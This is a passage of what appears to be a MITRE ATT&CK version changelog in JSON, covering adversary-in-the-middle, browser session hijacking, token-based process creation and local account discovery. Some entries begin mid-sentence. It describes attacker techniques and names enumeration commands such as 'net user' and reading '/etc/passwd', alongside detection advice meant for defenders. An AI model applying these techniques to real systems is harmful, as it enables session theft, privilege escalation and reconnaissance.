"x_mitre_detection": "Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"macOS",
"Linux"
],
"x_mitre_version": "2.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-09-28 13:09:51.467000+00:00\", \"old_value\": \"2020-10-16 15:19:48.733000+00:00\"}, \"root['name']\": {\"new_value\": \"Adversary-in-the-Middle\", \"old_value\": \"Man-in-the-Middle\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\\n\\nAdversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.\", \"old_value\": \"Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\\n\\nAdversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\\n+Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\\n \\n-Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.\\n+Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.\"}, \"root['x_mitre_data_sources'][0]\": {\"new_value\": \"Network Traffic: Network Traffic Content\", \"old_value\": \"Network Traffic: Network Traffic Flow\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.\", \"old_value\": \"Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 2.0",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may attempt to position themselves between two o | t | 1 | Adversaries may attempt to position themselves between two o |
| > | r more networked devices using a man-in-the-middle (MiTM) te | > | r more networked devices using an adversary-in-the-middle (A | ||
| > | chnique to support follow-on behaviors such as [Network Snif | > | iTM) technique to support follow-on behaviors such as [Netwo | ||
| > | fing](https://attack.mitre.org/techniques/T1040) or [Transmi | > | rk Sniffing](https://attack.mitre.org/techniques/T1040) or [ | ||
| > | tted Data Manipulation](https://attack.mitre.org/techniques/ | > | Transmitted Data Manipulation](https://attack.mitre.org/tech | ||
| > | T1565/002). By abusing features of common networking protoco | > | niques/T1565/002). By abusing features of common networking | ||
| > | ls that can determine the flow of network traffic (e.g. ARP, | > | protocols that can determine the flow of network traffic (e. | ||
| > | DNS, LLMNR, etc.), adversaries may force a device to commun | > | g. ARP, DNS, LLMNR, etc.), adversaries may force a device to | ||
| > | icate through an adversary controlled system so they can col | > | communicate through an adversary controlled system so they | ||
| > | lect information or perform additional actions.(Citation: Ra | > | can collect information or perform additional actions.(Citat | ||
| > | pid7 MiTM Basics) Adversaries may leverage the MiTM positio | > | ion: Rapid7 MiTM Basics) Adversaries may leverage the AiTM | ||
| > | n to attempt to modify traffic, such as in [Transmitted Data | > | position to attempt to modify traffic, such as in [Transmitt | ||
| > | Manipulation](https://attack.mitre.org/techniques/T1565/002 | > | ed Data Manipulation](https://attack.mitre.org/techniques/T1 | ||
| > | ). Adversaries can also stop traffic from flowing to the app | > | 565/002). Adversaries can also stop traffic from flowing to | ||
| > | ropriate destination, causing denial of service. | > | the appropriate destination, causing denial of service. |
SeDebugPrivilege and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "collection"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1185",
"external_id": "T1185"
},
{
"source_name": "Wikipedia Man in the Browser",
"description": "Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved January 10, 2018.",
"url": "https://en.wikipedia.org/wiki/Man-in-the-browser"
},
{
"source_name": "Cobalt Strike Browser Pivot",
"description": "Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.",
"url": "https://www.cobaltstrike.com/help-browser-pivoting"
},
{
"source_name": "ICEBRG Chrome Extensions",
"description": "De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.",
"url": "https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses"
},
{
"source_name": "cobaltstrike manual",
"description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.",
"url": "https://cobaltstrike.com/downloads/csmanual38.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Justin Warner, ICEBRG"
],
"x_mitre_data_sources": [
"Process: Process Modification",
"Process: Process Access",
"Logon Session: Logon Session Creation"
],
"x_mitre_detection": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "2.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 12:11:16.808000+00:00\", \"old_value\": \"2021-02-09 15:34:09.429000+00:00\"}, \"root['name']\": {\"new_value\": \"Browser Session Hijacking\", \"old_value\": \"Man in the Browser\"}, \"root['description']\": {\"new_value\": \"Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\\n\\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\\n\\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)\", \"old_value\": \"Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)\\n\\nA specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)\\n\\nBrowser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n-Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)\\n+Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\\n \\n-A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)\\n+A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\\n \\n-Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)\\n+Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)\"}, \"root['x_mitre_detection']\": {\"new_value\": \"This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.\", \"old_value\": \"This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications.\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][0]\": \"Process: Process Modification\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 2.0",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries can take advantage of security vulnerabilities a | t | 1 | Adversaries may take advantage of security vulnerabilities a |
| > | nd inherent functionality in browser software to change cont | > | nd inherent functionality in browser software to change cont | ||
| > | ent, modify behavior, and intercept information as part of v | > | ent, modify user-behaviors, and intercept information as par | ||
| > | arious man in the browser techniques. (Citation: Wikipedia M | > | t of various browser session hijacking techniques.(Citation: | ||
| > | an in the Browser) A specific example is when an adversary | > | Wikipedia Man in the Browser) A specific example is when a | ||
| > | injects software into a browser that allows an them to inher | > | n adversary injects software into a browser that allows them | ||
| > | it cookies, HTTP sessions, and SSL client certificates of a | > | to inherit cookies, HTTP sessions, and SSL client certifica | ||
| > | user and use the browser as a way to pivot into an authentic | > | tes of a user then use the browser as a way to pivot into an | ||
| > | ated intranet. (Citation: Cobalt Strike Browser Pivot) (Cita | > | authenticated intranet.(Citation: Cobalt Strike Browser Piv | ||
| > | tion: ICEBRG Chrome Extensions) Browser pivoting requires t | > | ot)(Citation: ICEBRG Chrome Extensions) Executing browser-ba | ||
| > | he SeDebugPrivilege and a high-integrity process to execute. | > | sed behaviors such as pivoting may require specific process | ||
| > | Browser traffic is pivoted from the adversary's browser thr | > | permissions, such as <code>SeDebugPrivilege</code> and/or hi | ||
| > | ough the user's browser by setting up an HTTP proxy which wi | > | gh-integrity/administrator rights. Another example involves | ||
| > | ll redirect any HTTP and HTTPS traffic. This does not alter | > | pivoting browser traffic from the adversary's browser throu | ||
| > | the user's traffic in any way. The proxy connection is sever | > | gh the user's browser by setting up a proxy which will redir | ||
| > | ed as soon as the browser is closed. Whichever browser proce | > | ect web traffic. This does not alter the user's traffic in a | ||
| > | ss the proxy is injected into, the adversary assumes the sec | > | ny way, and the proxy connection can be severed as soon as t | ||
| > | urity context of that process. Browsers typically create a n | > | he browser is closed. The adversary assumes the security con | ||
| > | ew process for each tab that is opened and permissions and c | > | text of whichever browser process the proxy is injected into | ||
| > | ertificates are separated accordingly. With these permission | > | . Browsers typically create a new process for each tab that | ||
| > | s, an adversary could browse to any resource on an intranet | > | is opened and permissions and certificates are separated acc | ||
| > | that is accessible through the browser and which the browser | > | ordingly. With these permissions, an adversary could potenti | ||
| > | has sufficient permissions, such as Sharepoint or webmail. | > | ally browse to any resource on an intranet, such as [Sharepo | ||
| > | Browser pivoting also eliminates the security provided by 2- | > | int](https://attack.mitre.org/techniques/T1213/002) or webma | ||
| > | factor authentication. (Citation: cobaltstrike manual) | > | il, that is accessible through the browser and which the bro | ||
| > | wser has sufficient permissions. Browser pivoting may also b | ||||
| > | ypass security provided by 2-factor authentication.(Citation | ||||
| > | : cobaltstrike manual) |
CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\n\nCreating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1134/002",
"external_id": "T1134.002"
},
{
"source_name": "Microsoft RunAs",
"description": "Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.",
"url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)"
},
{
"source_name": "Microsoft Command-line Logging",
"description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.",
"url": "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Vadim Khrykov"
],
"x_mitre_data_sources": [
"Process: OS API Execution",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Windows User Account Control",
"System access controls",
"File system access controls"
],
"x_mitre_detection": "If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Vadim Khrykov\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-17 14:51:48.978000+00:00\", \"old_value\": \"2020-03-26 21:28:19.476000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\\n\\nCreating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).\", \"old_value\": \"Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with DuplicateToken(Ex) and use it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,3 @@\\n-Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with DuplicateToken(Ex) and use it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.\\n+Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\\n+\\n+Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).\"}, \"root['external_references'][1]['source_name']\": {\"new_value\": \"Microsoft RunAs\", \"old_value\": \"Microsoft Command-line Logging\"}, \"root['external_references'][1]['description']\": {\"new_value\": \"Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.\", \"old_value\": \"Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)\", \"old_value\": \"https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\"}, \"root['x_mitre_detection']\": {\"new_value\": \"If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\\n\\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.\\n\\nAnalysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\", \"old_value\": \"If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\\n\\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\\n\\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n-If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\\n+If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\\n \\n-If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\\n+If an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.\\n \\n-Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\\n+Analysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"Microsoft Command-line Logging\", \"description\": \"Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.\", \"url\": \"https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may create a new process with a duplicated token | t | 1 | Adversaries may create a new process with a different token |
| > | to escalate privileges and bypass access controls. An adver | > | to escalate privileges and bypass access controls. Processes | ||
| > | sary can duplicate a desired access token with <code>Duplica | > | can be created with the token and resulting security contex | ||
| > | teToken(Ex)</code> and use it with <code>CreateProcessWithTo | > | t of another user using features such as <code>CreateProcess | ||
| > | kenW</code> to create a new process running under the securi | > | WithTokenW</code> and <code>runas</code>.(Citation: Microsof | ||
| > | ty context of the impersonated user. This is useful for crea | > | t RunAs) Creating processes with a different token may requ | ||
| > | ting a new process under the security context of a different | > | ire the credentials of the target user, specific privileges | ||
| > | user. | > | to impersonate that user, or access to the token to be used | ||
| > | (ex: gathered via other means such as [Token Impersonation/T | ||||
| > | heft](https://attack.mitre.org/techniques/T1134/001) or [Mak | ||||
| > | e and Impersonate Token](https://attack.mitre.org/techniques | ||||
| > | /T1134/003)). |
net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1087/001",
"external_id": "T1087.001"
},
{
"source_name": "Elastic - Koadiac Detection with EQL",
"description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.",
"url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Daniel Stepanic, Elastic"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"File: File Access"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-07-28 18:05:24.567000+00:00\", \"old_value\": \"2021-04-13 21:39:08.728000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\\n\\nCommands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.\", \"old_value\": \"Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\\n\\nCommands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\\n \\n-Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file.\\n+Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may attempt to get a listing of local system acc | t | 1 | Adversaries may attempt to get a listing of local system acc |
| > | ounts. This information can help adversaries determine which | > | ounts. This information can help adversaries determine which | ||
| > | local accounts exist on a system to aid in follow-on behavi | > | local accounts exist on a system to aid in follow-on behavi | ||
| > | or. Commands such as <code>net user</code> and <code>net lo | > | or. Commands such as <code>net user</code> and <code>net lo | ||
| > | calgroup</code> of the [Net](https://attack.mitre.org/softwa | > | calgroup</code> of the [Net](https://attack.mitre.org/softwa | ||
| > | re/S0039) utility and <code>id</code> and <code>groups</code | > | re/S0039) utility and <code>id</code> and <code>groups</code | ||
| > | >on macOS and Linux can list local users and groups. On Linu | > | >on macOS and Linux can list local users and groups. On Linu | ||
| > | x, local users can also be enumerated through the use of the | > | x, local users can also be enumerated through the use of the | ||
| > | <code>/etc/passwd</code> file. | > | <code>/etc/passwd</code> file. On macOS the <code>dscl . li | ||
| > | st /Users</code> command can be used to enumerate local acco | ||||
| > | unts. |
